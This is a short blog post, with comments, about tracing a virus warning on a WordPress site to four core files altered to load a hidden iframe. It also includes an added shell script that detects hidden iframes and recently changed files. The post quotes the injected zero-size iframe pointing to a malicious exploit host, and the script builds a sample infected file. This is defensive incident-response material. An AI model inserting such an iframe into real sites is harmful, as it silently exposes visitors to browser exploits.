Help, my WordPress blog is giving a virus warning!

I got called in to resolve an issue on a WordPress blog today. On the surface it looked as if the administration side of the site had broken, but the real cause turned out to be much darker than that.

Looking at the source of the page, I could see that lines were being inserted on all pages that tried to open an iFrame onto a website that used a browser exploit to try and install a virus on your computer. If my browser wasn’t patched and I wasn’t using a virus scanner, it could have been a ton of work for me to clean up. The question was, where was that iFrame coming from?

It turned out that a couple (4 actually) of WordPress files had been compromised and had extra lines added to them to open this iFrame. The files were:

  • wp-feed.php
  • wp-blog-header.php
  • wp-config.php
  • wp-load.php

This was the extra line:

<iframe src="http://google-analitics.ws/out.php?s_id=1" width="0" height="0" frameborder="0"></iframe>

These files are loaded on every WordPress page request and were the cause of the extra iFrame. The big question was how the files got compromised in the first place. They were set to the correct permissions, so they could only have been changed by someone (or a script) with root access to the server. Unfortunately this is not something you can protect against. Always make sure your blog is living on a reliable host and remember, “It’s wilder than Las Vegas out there”.
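Two checks that reproduce the investigation from this post, written here as an added example rather than code from the original post: a grep for zero-size iframes of the kind shown above (the marker the injection left behind), and a listing of files with a fresh modification time, which is how the four touched files were eventually spotted by sorting the FTP view by timestamp. The sample WordPress root it builds is constructed for the demonstration, and the iframe host in it is a placeholder, not the one from the post.

```shell
#!/bin/sh
# Added example, not part of the original post or of WordPress itself.

# Print every file under $1 that contains an <iframe> tag sized or styled to be
# invisible (width="0", height="0" or display:none) - the hidden-iframe injection
# pattern described in the post.
find_hidden_iframes() {
    grep -rlE '<iframe[^>]*(width="0"|height="0"|display: ?none)' "$1" 2>/dev/null | sort
}

# Print every regular file under $1 modified within the last $2 minutes.
# This is the "sort by timestamp" check done from the shell instead of an FTP client.
recently_modified() {
    find "$1" -type f -mmin "-$2" | sort
}

# Build a small constructed sample site root: two clean files with an old timestamp
# and one file carrying an injected hidden iframe (host is a placeholder).
make_sample_root() {
    dir=$(mktemp -d)
    mkdir -p "$dir/wp-content"
    printf '<?php\n// clean file\n' > "$dir/index.php"
    printf '<?php\n// clean file\n' > "$dir/wp-content/plugin.php"
    printf '<?php\n// ...\n?>\n<iframe src="http://EXAMPLE-MALICIOUS-HOST/out.php" width="0" height="0" frameborder="0"></iframe>\n' > "$dir/wp-config.php"
    # Back-date the clean files so only the injected one counts as recently modified.
    touch -t 200001010000 "$dir/index.php" "$dir/wp-content/plugin.php"
    echo "$dir"
}

# Run both checks against the constructed root and clean up afterwards.
demo() {
    root=$(make_sample_root)
    echo "Files containing a hidden iframe:"
    find_hidden_iframes "$root"
    echo "Files modified in the last 60 minutes:"
    recently_modified "$root" 60
    rm -rf "$root"
}

demo
```

Against a real install you would point both functions at the WordPress root (for example `find_hidden_iframes /var/www/html` and `recently_modified /var/www/html 1440` for the last day) and compare the two lists: a core file that appears in both is the one to diff against a clean copy of the same WordPress version.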

This entry was posted in security.

2 Responses to Help, my WordPress blog is giving a virus warning!

  1. brettbum says:

    How did you track the line of code down to those 4 files? Or even identify it in the first place?

  2. Owen says:

    @Brett: Well, I looked in the usual places (.htaccess, wp-content, etc) where malicious code sits, but didn’t find anything. I started walking through the code but thought that was too much hassle.

    Then I got the idea of sorting the files in FTP by timestamp and there, in the root, were the 4 files that had been touched with today’s timestamp. And there was the extra line of code.

    I thought I’d blog about it to stop people having to go through the whole investigation process.
